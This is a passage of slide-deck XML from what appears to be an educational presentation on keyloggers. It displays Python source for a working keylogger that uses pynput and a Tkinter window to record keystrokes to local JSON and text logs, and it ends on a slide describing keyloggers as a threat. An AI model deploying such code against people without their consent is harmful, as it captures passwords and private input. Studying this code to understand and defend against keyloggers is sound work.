            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    generate_json_file(keys_used)</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on_release(key):</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    )</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    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    generate_json_file(keys_used)</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    keys = keys + str(key)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    generate_text_log(str(keys))</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="92000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1231075" y="1428500"/>
            <a:ext cx="10877700" cy="446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700">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Libre Franklin"/>
                <a:ea typeface="Libre Franklin"/>
                <a:cs typeface="Libre Franklin"/>
                <a:sym typeface="Libre Franklin"/>
              </a:rPr>
              <a:t>i</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581192" y="702156"/>
            <a:ext cx="11029500" cy="530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41" name="Google Shape;141;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581250" y="1232550"/>
            <a:ext cx="11029500" cy="3937500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit fontScale="32500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>def start_keylogger():</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    listener = keyboard.Listener(on_press=on_press, on_release=on_release)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    listener.start()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    start_button.config(state='disabled')</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    stop_button.config(state='normal')</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def stop_keylogger():</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    listener.stop()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    label.config(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    start_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    stop_button.config(state='disabled')</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root = Tk()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>root.title("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>label.config(anchor=CENTER)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>label.pack()</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start_button = Button(root, text="Start", command=start_keylogger)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>start_button.pack(side=LEFT)</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stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>stop_button.pack(side=RIGHT)</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root.geometry("250x250")</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>root.mainloop()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="92000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1231075" y="1428500"/>
            <a:ext cx="10877700" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr"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IN" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Libre Franklin"/>
                <a:ea typeface="Libre Franklin"/>
                <a:cs typeface="Libre Franklin"/>
                <a:sym typeface="Libre Franklin"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:latin typeface="Libre Franklin"/>
              <a:ea typeface="Libre Franklin"/>
              <a:cs typeface="Libre Franklin"/>
              <a:sym typeface="Libre Frankli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1"/>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48" name="Google Shape;148;p21"/>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05435" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1840"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keyloggers are a potent threat to both individuals and enterprises, with the potential to cause significant harm if left undetected. Understanding the nature of keyloggers, their methods of infiltration, and the dangers they pose is crucial for maintaining a secure digital environment.</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